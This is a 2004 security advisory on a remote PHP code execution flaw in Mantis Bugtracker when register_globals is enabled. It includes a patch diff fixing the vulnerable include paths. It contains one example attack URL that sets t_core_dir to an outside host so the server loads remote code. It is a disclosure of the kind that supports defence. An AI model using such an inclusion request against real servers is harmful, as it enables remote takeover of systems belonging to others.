---------------------------------------------------------------------------
Mantis Bugtracker Remote PHP Code
Execution Vulnerability
---------------------------------------------------------------------------
Author: Joxean Koret
Date: 08-01-2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mantis Bugtracker
Mantis is a web-based bugtracking system. It is
written in the PHP scripting
language and requires the MySQL database and
a webserver.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Remote PHP Code Execution Vulnerability
A1. If the REGISTER_GLOBAL variable is set an
attacker can execute arbitrary
php code by overwriting the global variable
$t_core_dir with our desired url
(for example
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/)
The following files are vulnerables :
bug_api.php -> at line 22? (using variable
$t_core_path)
relationship_api.php -> Line 14 (using variable
$t_core_dir)
The fix:
~~~~~~~~
Both of these issues have now been fixed in
CVS.
There is also a Patch for the Mantis 0.19.0a
version
=====================================================================
mantis.patch
bug_api.php
@@ -19,7 +19,7 @@
require_once( $t_core_dir .
'sponsorship_api.php' );
# MASC RELATIONSHIP
-
require_once( $t_core_path.'relationship_api.php' );
+
require_once( $t_core_dir.'relationship_api.php' );
# MASC RELATIONSHIP
and to relationship API:
### Relationship API ###
+ $t_core_dir =
dirname( __FILE__ ).DIRECTORY_SEPARATOR;
+
require_once( $t_core_dir .
'collapse_api.php' );
# MASC RELATIONSHIP
=====================================================================
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
